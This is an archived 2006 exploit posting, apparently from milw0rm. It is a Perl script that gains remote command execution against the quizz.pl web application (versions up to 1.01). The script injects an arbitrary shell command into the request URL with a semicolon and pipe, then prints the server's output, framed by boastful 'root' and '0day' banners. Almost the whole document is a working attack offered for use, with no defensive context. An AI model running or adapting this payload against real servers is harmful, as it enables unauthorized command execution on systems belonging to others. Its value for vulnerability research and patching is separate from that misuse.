quizz <= 1.01 (quizz.pl) Remote Command Execution Exploit :

Date : 2006-04-13 Author : FOX_MULDER
#!/usr/bin/perl
#
#  quizz.p exploit by FOX_MULDER ([email protected])
#
#  Vulnerability foud by WBYTE.
#
#  Born to be root !!!
#  
#  !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!!
#
#  FACT:Wbyte doesn't sleeps , he waits !.
#  0day
####################################################################################

use IO::Socket;
use LWP::Simple; 

sub Usage {
print STDERR "
FOX_MULDER DID IT AGAIN !!!
";
print STDERR "Usage:
quiz.pl <www.example.com> </path/> "cmd"
";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "

 !!! PRIVATE PRIVATE PRIVATE !!! 

";
print "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDER
";

print "
[+] Conecting to $host
";
print "
[+] Injecting command . . .

";

my $result = get("http://$host$path/quizz.pl/ask/;$command|"); 

if (defined $result) { 
print "fox@nasa# $result"; 
} 
else { 
print "Error with request.
"; 
}

# milw0rm.com [2006-04-13]

C1

 

C2

 

C3